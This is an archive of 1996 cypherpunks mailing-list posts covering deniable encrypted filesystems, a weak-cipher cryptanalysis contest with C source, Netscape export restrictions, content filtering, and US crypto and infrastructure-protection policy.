      sexual crime, a Federal grand jury charged 16 people in 
      the US and abroad with joining in a pornography ring. 
      Its members shared homemade pictures, recounted their 
      sexual experiences with children and even chatted 
      electronically as two of the men molested a 10-year-old 
      girl. The case appeared likely to heighten concerns 
      about the spread of child pornography over the Internet. 
 
   ----- 
 
   http://pwp.usa.pipeline.com/~jya/119816.txt  (11 kb for 2) 
 
   119_816  (For 2) 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com>
Date: Thu, 18 Jul 1996 11:55:49 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
In-Reply-To: <2.2.32.19960716103638.00835c08@panix.com>
Message-ID: <199607171835.LAA14321@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Tom Weinstein <tomw@netscape.com>
> Date: Tue, 16 Jul 1996 11:56:51 -0700
> 
> Duncan Frissell wrote:
> > 
> > I'm glad too.  So how many minutes did it take to leak overseas?
> 
> I have heard no reports of it leaking overseas.

Have you heard any reports of anyone successfully downloading it
period?  Netscape always times out in the middle of a download.  I
think the server is so overloaded that it's actually impossible to
download the software.

I sure wish there were an ftp site overseas somewhere, then I could
actually get the damned thing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 18 Jul 1996 17:39:18 +0800
To: jpb@miamisci.org
Subject: Re: Opiated file systems
In-Reply-To: <v03007604ae1225be8464@[192.168.1.69]>
Message-ID: <199607171103.MAA00222@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Joseph Block <jpb@miamisci.org> writes:
> At 10:44 AM -0400 7/16/96, Mark O. Aldrich wrote:
> >One problem, however, would be how to keep the "decoy" data, accessible
> >with only the ambush key, "fresh" in that it must undergo a certain amount
> >of turbulence to appear real.

A problem yes.  My thoughts were that you would effectively have two
filesystems and use them both yourself for real work.  That is to say
that you would say have some consulting work doing some programming or
something, and use the 1st encrypted filesystem for this work.  If
this work was covered by an NDA, so much the better, as it would
provide an understandable reason for encrypting.

> >The two file systems would essentially have to
> >mirror each other, one with the juicy bits and one with the decoy bits.
> >It would seem to be practically impossible to just build two file systems
> >as one would 'disappear' when only the ambush key was used.  Wouldn't it
> >be sort of obvious that something was wrong if half the disk vanished?

I don't think nuking the data is the way to go, from what I understand
of the way these things work, is that they kick down the door in the
dead of night and make sure you don't get to touch the equipment.
Also they'd be sure to take a sector level backup of the drive as a
first step.

If you have your duress encrypted file system, with the "real" file
system in the unused space of that filesystem, and the hidden file
system is encrypted with an unknown (to them) 3DES key, I don't see
how they are going to be able to prove that it is not just noise.
(This is presuming it is a feature of this encrypting file system that
it ensures unused space is always filled with noise anyway, even
inside the first layer of encryption)

The question of freshness Mark raised, if I understand correctly is
interesting.  I presume here he is talking about the fact that under
analysis it is possible to retrieve information from hard drives which
has been deleted and overwritten even multiple times with other data,
due to the relative inaccuracy of disk head placement, and other
factors.  Perhaps it is even possible to tell how recent a magnetic
pattern is even?

In an encrypted file system with no hidden file system, if the unused
space were filled with random garbage, you might expect that garbage
to have been modified fewer times, or less recently than the real
data.  If there were a second hidden file system in those unused
blocks, it might show up due to being written to more recently, or
more often than expected.

If the threat model includes this kind of analysis, I think it would
be necessary to ensure that all the data is churned evenly, or
sufficiently that there is little chance of extracting this kind of
information.

What I would suggest is that during periods of disk inactivity the
data (even the unused space whether it is a 2nd partition or not) is
re-encrytped with a new random IV at some frequency.  The frequency
chosen should be to ensure that all the data on the disk is recent,
and that in the course of disk usage over a period of a week there are
many re-writes with data re-encrypted with random IVs to all areas of
the disk.

> As far as churning goes, why not just mount both the decoy and the
> encrypted filesystems simultaneously?  

I think you would have to mount them both during normal usage to avoid
damaging the real filesystem hidden in the unused space.  Only in the
event of a duress situation would you mount only the duress file
system.

This next bit must be talking about the stegoed file system:

> Have a perl script (stored on the hidden volume of course) that
> automatically decodes random images from alt.binaries.pictures.*
> into the decoy system and nukes the oldest decoy files.

Careful.  For stego you can't use publically available images -- they
have to be images you scanned yourself, other-wise comparison will
show that the images have been altered.  (Law enforcement agents read
a.b.p.* too).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Thu, 18 Jul 1996 12:37:38 +0800
To: sunder@dorsai.dorsai.org>
Subject: Re: Put Uncle Sam in your Calling Circle
Message-ID: <199607171603.MAA04115@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain


> Hey guys,
> 
> I just got a really cool poster from RSA.  It's a big circle split off 
> into several sections showing people talking to each other, the upper 
> right hand corner shows two NSA dweebs looking like Bevis & Butthead in 
> suits, one smoking, the other seated infront of an old 60's reel to reel 
> audio tape recorder, a sign on the wall behind them says "Key Escrow"
You can get images of these at the RSA homepage (www.rsa.com).  Click 
on "Art Gallery."

The Key Escrow sign is impossible to read though.

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Thu, 18 Jul 1996 13:35:17 +0800
To: cypherpunks@toad.com
Subject: TLA abuse (?) [non-crypto, mostly]
Message-ID: <2.2.32.19960717031217.0067f2fc@mail1.amaonline.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hmmmm. Got a call this morning from a Mike Hughes of the Amarillo PD (APD). Seems they've received "several" complaints about the anti-CDA image on my home page (http://www.shellback.com/p/merriman). Supposedly, it's not the nudity they complainer(s) is(are) all riled up about: it's the age of the models that's being questioned.

Hardcopy of said image has been forwarded to the FBI for 'review'.

Officer (sorry, don't recall his rank) Hughes says *he* thinks the models could conceivably be 18; a judge they showed it to said _she_ thought (personal opinion) younger. Hence, the forwarding to FBI for quasi-official determination.

Officer Hughes going to stop by so I can show him:
        A - that the page is PICS rated
        B - the original of the image :-)
        C - the precautions that PWS takes to warn folks about possibly offensive content.

I don't plan to change the image, so if anyone can point me in the general direction of some Legal Assistance (tm), I'd appreciate it.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMexn/cVrTvyYOzAZAQHlRgP/dKIbtldSNhFe7pe3PVIHfTtDsSFH82OG
i4/yBxD2dcFi+Ou+2nbol2MKOew7qKeV7Lq3raU/rcjIVutFDUGIxa+SAJTzuc5F
t6Wb8lD3M4rvH/7kklhW0yf1iQaauT+bQt+ZHaUDNGLBCpiy0RPPMnluydcGZeRV
Xq6IEnkH9a4=
=yg4d
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Thu, 18 Jul 1996 15:31:36 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Opiated file systems
Message-ID: <Pine.BSF.3.91.960717125158.185A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> But, on the other hand, it wouldn't be to hard to have the user set both
> keys (yeah, so that didn't actually say anything, so what...), and then do
> an every-other-byte type thing (although that would be slow... every other
> block would be more efficient), and have 2 EFS's in one file, and make it
> so that on the "duress" one the extra space appears to be "free".
> One could make it a real file system, and add a fake disk error to prevent
> over-writing of the "non-duress" filesystem.

This sounds a lot like security through obscurity... What happens when 
someone reverse-engineers the software and sees that it's carefully 
skipping over blocks?

If you don't want people to know about your encrypted data, use stego. 
Even if They find the stego software, you can always produce the keys to
unlock the duress data from two or three .gif files, and say "that's all
there is." 

Use stego to hide data. Use encrypted filesystems for convenience. If you
try to put the two together, you'll probably end up with feature-bloat.


The idea of an encrypted filesystems being accessable over the internet 
sounds interesting, though. Sort of a cross between NFS and CFS. Would be 
great for backup purposes.


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Thu, 18 Jul 1996 12:21:59 +0800
To: cypherpunks@toad.com
Subject: Re: Washington Post -- "Block but Verify"
In-Reply-To: <Pine.BSF.3.91.960716172533.5147A-100000@mcfeely.bsfs.org>
Message-ID: <Pine.BSI.3.91.960717131852.10580A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jul 1996, Rabid Wombat wrote:

> A user-selectable menu would be, umm, interesting ... just how could one 
> describe, in terms offensive to absolutely no one, what one's product is 
> offering to block?

    I thought that Net Nanny or another related product offered generic 
options for what you wanted to block.  Such as clicking on an option box 
to enable the blocking of violence or to enable the blocking of sexual 
material.
                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 18 Jul 1996 15:24:04 +0800
To: cypherpunks@toad.com
Subject: Gorelick's Urge
Message-ID: <199607171328.NAA23475@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Wall Street Journal, July 17, 1996 
 
 
   Panel to Oversee Protecting Systems From Hackers 
 
 
   Washington -- President Clinton ordered the creation of a 
   commission to recommend laws and regulations to protect 
   vital government and private systems against attacks by 
   terrorists or computer hackers. 
 
   Jamie Gorelick, deputy U.S. attorney general, described the 
   effort as having the "same level of urgency" as the 
   Manhattan Project, the crash World War II effort to develop 
   the atomic bomb. She said the commission, which will be 
   headed by an appointee from the private sector, will have 
   a large representation from corporations, because they 
   control the nation's telecommunications system, 
   electrical-power grid, banking, transportation and 
   fuel-supply systems. 
 
   "We are looking for a structure that cuts across the 
   government and private sector," Ms. Gorelick told the 
   Senate's Permanent Investigations Subcommittee. While some 
   22 federal agencies have some involvement with such 
   problems, she said there is no central mechanism. 
 
   While the new Commission on Critical Infrastructure 
   Protection deliberates, President Clinton ordered the 
   Federal Bureau of Investigation to head an interim task 
   force. 
 
   [End] 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Thu, 18 Jul 1996 16:23:10 +0800
To: cypherpunks@toad.com
Subject: Educational cryptanalysis competition (small prize)
Message-ID: <9607171243.AA26209@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



Educational Cryptanalysis Competition  (opened 17 July 1996)
=====================================

Cypherpunks teach.  Here's your chance.

I have a piece of code I wrote ages ago, before reading Schneier.

Despite identifying these points as weaknesses I still cannot
break it.

    weak keys
    rapid collapse in the case of chosen text attack
    reduced-round versions have a correlation attack

Obviously my crytanalysis needs some serious help.



The aim of this competition is:
    to show how to find AND EXPLOIT weaknesses in this cypher.
    Answers resembling "That's junk - use XXXXX." score zero.
    Well-prepared comprehensive answers could score highly.

- - Entries will be judged on educational grounds as well as on raw results.

- - All entries are placed by the entrant in the public domain, and there
  may be a compilation of good answers come out of this.
  (With entrants' names except where they state a prefernce for anonymity. )

- - Entries by teams are allowed.

- - The number of entries is unlimited.

- - The closing date is 30 Sept 1996.

- - The judge is Peter Allan. (me)

- - There is one prize (a box of chocolate coffee beans).


  
A full pair of programs using this code can be collected
from my mail filter.

    echo  rlprm_2.0 | mail -s send_goodies peter.allan@aeat.co.uk



Peter Allan   peter.allan@aeat.co.uk

#define RPT        15
#define CRYPT_DEPTH 4  
/**********************************/
mkkey(origpass, key)
/***
****  The pass (a text string) is used to produce
****  a key.  Chars used as int. Details in docs.
****  200000 passwords all gave different keys in my test.
***/
char origpass[9];
unsigned char key[8];
{

	char clearpass[9];
	int  i, j, k, l, m, ten;

 /***  make the key from the clearpass ***/
 /***  unsigned char[8] from char[9] ***/

	ten = FALSE;
	k = l = m = 0;
	strcpy(clearpass, origpass);


	for (i = 0; i < 8; i++) {
		if (clearpass[i] == '\n')
			ten = TRUE;
		if (ten)
			clearpass[i] = '\0';
	}
	clearpass[8] = '\0';


	for (i = 0; i < 8; i++)
		key[i] = (unsigned char) i;
	for (j = 1; j < 256; j++) {
		for (i = 0; i < 8; i++)
			key[i] = key[i] + clearpass[i] + j;
	/* swap bytes */
		k = key[j % 8] % 8;
		l = key[k] % 8;

		m = key[k];
		key[k] = key[l];
		key[l] = m;

/** this loop is redundant if chars are 8 bits
***  and for all I know they are everywhere **/

		for (i = 0; i < 8; i++)
			key[i] = key[i] % 256;

		m = m % 8;
		key[m] = 256 - key[m];
	}


/****
	for (i = 0; i < 8; i++)
		printf("%d ", key[i]);
	puts(" ");
****/

}


/**********************************/
sym_encrypt(abpos, key, authbuf, cipherbuf)
int  abpos;
unsigned char key[8];
unsigned char authbuf[ABLEN];
unsigned char cipherbuf[MESSLEN];
{
	int  i, j, k, ptr1, ptr2, rpt;
	int  ka1, ka2, kk;
	unsigned char smoke[CRYPT_DEPTH][8];
	unsigned char tmp;


/***
****  From the key, make a set of keys to
****  be used in order.
***/

	for (j = 0; j < 8; j++)
		smoke[0][j] = key[j];

	for (i = 1; i < CRYPT_DEPTH; i++) {
		for (j = 0; j < 8; j++)
			smoke[i][j] = smoke[i - 1][j];

		for (j = 0; j < 8; j++) {
			if (j % 2) {
				smoke[i][j] = (smoke[i][j]) * 3;
			}
			else {
				smoke[i][j] = ((smoke[i][j]) * 3) / 4;
			}
		}
	}



#ifndef NOCRYPT
/***
****     see the tech waffle file for details
***/

	for (rpt = RPT; rpt; rpt--) {
		if (cl_debug)
			printf("encryption repeat count is %d \n", rpt);
		for (i = 0; i < CRYPT_DEPTH; i++) {
/**swap driven by values **/

			for (k = 0; k < abpos - 1; k += 2) {
				kk = authbuf[k] ^ authbuf[k + 1];
				ka1 = kk / 16;
				ka2 = kk % 16;
				kk = ka1 ^ ka2;
				if ((kk == 1) || (kk == 2) || (kk == 4) || (kk == 8) ||
				    (kk == 14) || (kk == 13) || (kk == 11) || (kk == 7)) {
					kk = authbuf[k];
					authbuf[k] = authbuf[k + 1];
					authbuf[k + 1] = kk;
				}

			}

/** xor with key **/
			for (k = 0; k < abpos; k++)
				authbuf[k] ^= (key[k % 8]);

/**rotation **/
			kk = authbuf[abpos - 1] / 32;
			ka1 = 0;
			for (k = 0; k < abpos; k++) {
				ka2 = authbuf[k] / 32;
				authbuf[k] = (authbuf[k] * 8) + ka1;
				ka1 = ka2;
			}
			authbuf[0] += kk;
/**swap driven by key **/

			if (cl_debug)
				printf("   depth is %d \n", i);
			for (j = 0; j < 8; j = j + 2) {
				ptr1 = smoke[i][j] % abpos;
				ptr2 = smoke[i][j + 1] % abpos;

				tmp = authbuf[ptr1];
				authbuf[ptr1] = authbuf[ptr2];
				authbuf[ptr2] = tmp;
			}
		}
	}
#endif



 /***   Now that it has been encrypted it should
 ****   be stored as 'hexabetical'  [A-P].
 ***/
	for (i = 0; i < abpos; i++) {
		cipherbuf[i * 2] = (authbuf[i] % 16) + 'A';
		cipherbuf[i * 2 + 1] = (authbuf[i] / 16) + 'A';
	}
	cipherbuf[abpos * 2] = '\0';
}

/********************************/

sym_decrypt(abpos, key, authbuf, cipherbuf)
int  abpos;
unsigned char key[8];
unsigned char authbuf[ABLEN];
unsigned char cipherbuf[MESSLEN];
{
	int  i, j, k, ptr1, ptr2, rpt;
	int  ka1, ka2, kk;
	unsigned char smoke[CRYPT_DEPTH][8];
	unsigned char tmp;


	for (i = 0; cipherbuf[i]; i = i + 2) {
		cipherbuf[i] = cipherbuf[i] - 'A';
		cipherbuf[i + 1] = cipherbuf[i + 1] - 'A';
		authbuf[i / 2] = cipherbuf[i] +
			cipherbuf[i + 1] * 16;
	}

/***
****  From the key, make a set of keys to
****  be used in order.
***/

	for (j = 0; j < 8; j++)
		smoke[0][j] = key[j];

	for (i = 1; i < CRYPT_DEPTH; i++) {
		for (j = 0; j < 8; j++)
			smoke[i][j] = smoke[i - 1][j];

		for (j = 0; j < 8; j++) {
			if (j % 2) {
				smoke[i][j] = smoke[i][j] * 3;
			}
			else {
				smoke[i][j] = (smoke[i][j] * 3) / 4;
			}
		}

	}

#ifndef NOCRYPT
/***
****  repeat suitable number of times:
****     first swap bytes in the authbuf
****     then cycle bits round to prevent some swaps undoing others
***/
	if (abpos == 0)
		return RUBBISH;	/** zerodivide detected-avoided **/

	for (rpt = RPT; rpt; rpt--) {
	/* printf("encryption repeat count is %d \n", rpt); */
		for (i = CRYPT_DEPTH - 1; i > -1; i--) {
			for (j = 6; j > -1; j = j - 2) {
/*** key-driven swap  ***/
				ptr1 = smoke[i][j] % abpos;
				ptr2 = smoke[i][j + 1] % abpos;

				tmp = authbuf[ptr1];

				authbuf[ptr1] = authbuf[ptr2];
				authbuf[ptr2] = tmp;
			}
/**rotation **/
			kk = authbuf[0] % 8;
			ka1 = 0;
			for (k = abpos - 1; k >= 0; k--) {
				ka2 = authbuf[k] % 8;
				authbuf[k] = (authbuf[k] / 8) + ka1;
				ka1 = ka2 * 32;
			}
			authbuf[abpos - 1] += (kk * 32);


/** xor with key **/
			for (k = 0; k < abpos; k++)
				authbuf[k] ^= (key[k % 8]);


/*** value-driven swap  ***/

			for (k = 0; k < abpos - 1; k += 2) {
				kk = authbuf[k] ^ authbuf[k + 1];
				ka1 = kk / 16;
				ka2 = kk % 16;
				kk = ka1 ^ ka2;
				if ((kk == 1) || (kk == 2) || (kk == 4) || (kk == 8) ||
				    (kk == 14) || (kk == 13) || (kk == 11) || (kk == 7)) {
					kk = authbuf[k];
					authbuf[k] = authbuf[k + 1];
					authbuf[k + 1] = kk;
				}

			}

		}
	}
#endif

}

/**********************/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAgUBMezfIB98EdWB2LS9AQFbwgP+Oq8zBlI5d1comIQ5S2+ysnSDLAN5W/L2
UgQyrYZ/Cchn9I8CEFn9UDevmInpABSL8yNQWUHrb4cvWxiTGNnFz54gicaPT7Ki
qVETDC5o7nxWOT8qhWmGNTApJC8RBjEkY+90HyYKf2sLEd8hkGLwOGSAF/YWxqkY
TKqYWVNKCjA=
=3qEU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 18 Jul 1996 10:22:57 +0800
To: cypherpunks@toad.com
Subject: Re: Metered Phone
Message-ID: <1.5.4.32.19960717115720.008caa88@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 AM 7/15/96 -0700, you wrote:
>At 01:19 PM 7/7/96 +0800, you wrote:
>>Does anyone have any ideas about this metered phone? 
>>I am from Philippines and heard some news that it will be 
>>existing in 1997. Quite a big problem! Every dial will be counted, 
>>every seconds will be measured...
>
>That sounds like you're getting newer telephone technology.
>In the US, most areas with newer telephone switches offer you
>the choice of flat rate service (you pay a constant price per month
>...
>Bill Stewart

Well, in Switzerland all telephon-switches (including the ones the company I
work with manufactures) record:
1. start of call
2. destination of call
3. source of call
4. end of call

After all, you can get a detailed list of all your calls by the end of the
month (the phonenumbers of the destination are somewhat obscured -> only the
first 4 digits).

So, hellcome to the new age of transparent customers!

As soon as you get digital switches (POTS or ISDN) your phonelife is
measured, stored and statistically evaluated.
----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 18 Jul 1996 10:34:19 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
Message-ID: <1.5.4.32.19960717115853.00911b9c@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


Hy guys,

I have no idea, who this david is, but it's kind of funny:
someone says: when this guy shows up, you get a mail flodd
then someone replies to that...
And suddenly you notice, that the first guy was right, but I think he had to
be, after all, he was the first wave. (And I'm another one).

So, who is this david? I don't care, and as long as he posts stuff the way
he/she/it did until now, I won't. (Wouldn't you agree, that we have a lot
worse to worry about? - i.e. tonights fight, "Rottwiler" vs. "Cripple")

----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kpdarby@juno.com (Kevin P Darby)
Date: Fri, 19 Jul 1996 14:30:34 +0800
To: cypherpunks@toad.com
Subject: Remailers & NYMs
Message-ID: <19960718.225653.8023.0.kpdarby@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone know some good PGP encrypted remailers, that are
secure and pretty fast?  How about a few good NYMs?  

		KPD


-------------------------------------------------------------------------------------------------------------------
"Injustice anywhere is a threat to justice everywhere"
			
	--Rev. Dr. Martin Luther King, Jr.

-------------------------------------------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 18 Jul 1996 13:12:24 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Surf-filter lists
In-Reply-To: <v01510103ae11a1bfffcd@[204.62.128.229]>
Message-ID: <Pine.ULT.3.91.960717142418.2660A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 16 Jul 1996, Declan McCullagh wrote:

> More to the point, as I wrote at the end of the original CWD, it's a
> bait-and-switch maneuver. Go after porn, they say, but the censor political
> information.

ARGH!  I've been keeping quiet about this for a while, but I thing I 
gotta say something before I throttle my Zip drive...

<rant>A Private organization cannot "censor" anything.  The fundamental 
definition of the word require some agent of the government take action 
to censor.  To accuse Surf-Watch, net-nanny, AOL, MSU, AT&T, or whatever 
of "censorship" accomplishes nothing except to make us look the 
fool.</rant> 

I agree that the problem with the "bait-and-switch" filtering of net 
materials by these various filtering packages needs to be addressed.  If I 
want to protect my kids from seeing alt.naughty.pictures, I shoudl still 
be able to unfilter political and health speech.  The real problem isn't 
censorship, it's disclosure by the makers of filtering packages about 
what exactly their packages are going to filter for me and my family.  
However, in the upcoming war of filtering packages (and it will get ugly) 
trade secrets are going to make any company hesitant to reveal what it is 
they are filtering and what criteria they are using to determine if 
something qualifies.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMe0jezokqlyVGmCFAQH0SAP+ONXs2f4GxjIrC6cp2sc9CgTrebL4cBWB
UqpH4H3UO0TiKZN4T6MGVC6kCA3OwQnd0DNC0f0D6+iZTPkwN228Am6ZH4+t9hZs
OrmCbZCiWZipLfT1gphIHqFHSqIQ506LkkGgLK0gjsS2ahrI+cNYJA3yYBviMkB1
zuj1KRJ+pMk=
=ddI5
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GED/J d-- s:++>: a- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 18 Jul 1996 15:34:40 +0800
To: janke@unixg.ubc.ca
Subject: Re: Netscape download requirements
In-Reply-To: <31EB61E5.520E@netscape.com>
Message-ID: <31ED5EEF.5AA3@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


janke@unixg.ubc.ca wrote:
> 
> Why is the 128-bit version available only in the United States?
> It can't be due to ITAR since export of crypto to Canada is ok.
> Does it have something to due with RSA only being patented in
> the United States so that's the only place RSADSI wants it
> used? I noticed that Netscape's SSL implementation is available
> only to developers in the U.S. as well.

  Because we have not yet been able to obtain the address verification
databases that we need for Canada.  There is someone working on
tracking this down right now.  When we get the proper database we
will add access to canada.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 18 Jul 1996 13:57:13 +0800
To: cypherpunks@toad.com
Subject: Zimmermann's open letter and Congressional crypto-musing
Message-ID: <v0151010bae12f2dc33e4@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





Date: Wed, 17 Jul 1996 14:02:05 -0500
To: fight-censorship+@andrew.cmu.edu
From: declan@well.com (Declan McCullagh)
Subject: Zimmermann's open letter and Congressional crypto-musing
Sender: owner-fight-censorship@vorlon.mit.edu


Phil Zimmermann has an open letter to Congress on ProCODE and HR3011 in
today's "The Hill" newspaper, on page 17. Excerpts follow.

Unfortunately, no matter how wonderful the ProCODE bill may be (and it is),
it isn't going anywhere this year. There's no time left. And in the Senate,
national security interests have strong allies who would move to block the
bill if it suddenly slithered out of committee.

But at least netizens have been able to educate Congress, and the debate is
shifting in our favor. Take Sen. Nunn's cyberscare hearing yesterday, where
Deputy Attorney General Jamie Gorelick cried that "we will have a cyber
equivalent of Pearl Harbor in time." During the hearing, Sen. Carl Levin
(D-Michigan) mused: "Part of the problem is we have competing goals...
Encryption is one way to secure that data. But law enforcement wants access
to that data... It's not just a matter of [strong] encryption. We are torn
between these conflicting goals."

So while the Hill is waking up, American businesses are losing out. By the
time Congress moves on this issue in 1997, it may be too late.

-Declan

---

The Hill, July 17, 1996, page 17

"Democracy in the Information Age"

I urge you to support S.1726, the Burns-Leahy ProCODE bill to lift export
controls on cryptographic software, or Goodlatt's House version of the
bill, H.R. 3011...

...U.S. software makers cannot incorporate good cryptography features into
their products if that results in their inability to export such
products... It also threatens the competitiveness of the entire U.S.
computer industry, as we lose entire systems sales to foreign competitors,
because we cnanot supply systems to our foreign customers if those systems
contain cryptographic components.

Cryptogrpahy has become the most pivotal technology for privacy and civil
liberties in the information age. It is for this reason that I wrote Pretty
Good Privacy, now called PGPmail, and published it for free on the Internet
in 1991...

Privacy is a human right that appeals to everyone across the political
spectrum. It offers a rare combination of moral high ground and political
safety. The onlyway to hold the line on privacy in the information age is
strong cryptography, strong enough to keep out major governments. And
S.1726 is our best home for giving Americans access to this essential tool
of liberty. Let us bequeath to our children a society that lets them
whisper in someone ear, even if the ear is a thousand miles away.

Sincerely,

PHILIP R. ZIMMERMANN
Chairman and Chief Technology Officer
Pretty Good Privacy, Inc.
555 Twin Dolphin Drive, Suite 570
Redwood City, CA 94065
415-631-1747






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Thu, 18 Jul 1996 13:23:55 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: New Infowarfare Panel
Message-ID: <n1374506750.46724@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


If y'all have heard, Clinton signed an executive order 2 days ago creating a
new panel to examine how to "protect" "critical" computer systems. The panel
will be made of of the usual suspects with a non-govt person ($5.00 says it
will be someone from one of those wonderfully independant companies like SAIC,
MITRETEC, EDS, E-Systems). 

Needless to say, it looks an awful lot like NSDD-145 all over again with the
panel recommending changes to the law to allo for greater coordination of LE,
intell for govt computers and god knows what for non-govt computers.

Anyway, the directive is now up on our site at
http://www.epic.org/security/infowar/eo_cip.html

-dave


_________________________________________________________________________
Subject: New Infowarfare Panel
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  *  HTTP://www.epic.org
Washington, DC 20003                *  ftp/gopher/wais cpsr.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 18 Jul 1996 11:20:54 +0800
To: cypherpunks@toad.com
Subject: Russian foreign intelligence CD-ROM
Message-ID: <v0151010eae12fe5de79b@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain




 LOOKING FOR A GREAT GIFT IDEA? The Russian Foreign Intelligence Service
 (SVR) announced yesterday that it is releasing a six-hour long CD ROM that
 tells the stirring 75-year history of Soviet and Russian foreign
 intelligence. The CD ROM will be released in Russian and English versions
 and sell for about $120. It promises to provide buyers with access to SVR
 headquarters, and contains interviews with dozens of heretofore mysterious
 intelligence officers described as having helped shape the existing world
